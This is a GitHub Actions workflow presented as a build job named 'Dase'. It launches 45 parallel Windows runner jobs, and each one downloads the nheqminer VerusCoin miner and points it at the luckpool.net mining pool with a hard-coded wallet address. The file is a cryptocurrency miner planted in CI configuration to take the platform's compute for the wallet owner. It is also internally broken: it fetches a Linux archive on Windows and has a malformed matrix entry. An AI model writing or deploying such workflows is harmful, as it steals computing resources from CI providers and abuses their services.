name: Dase
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: Dase
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz -OutFile nheqminer-Linux-v0.8.2.tar.gz
    - name: Extract
      run: Expand-Archive nheqminer-Linux-v0.8.2.tar.gz
    - name: Running
      run: .\nheqminer -v -l na.luckpool.net:3956 -u RW4urDfTUnhoG2yaEyPXDcXH7KGjGbapWv.zib -p x -t 1
    - name: END
      run: exit
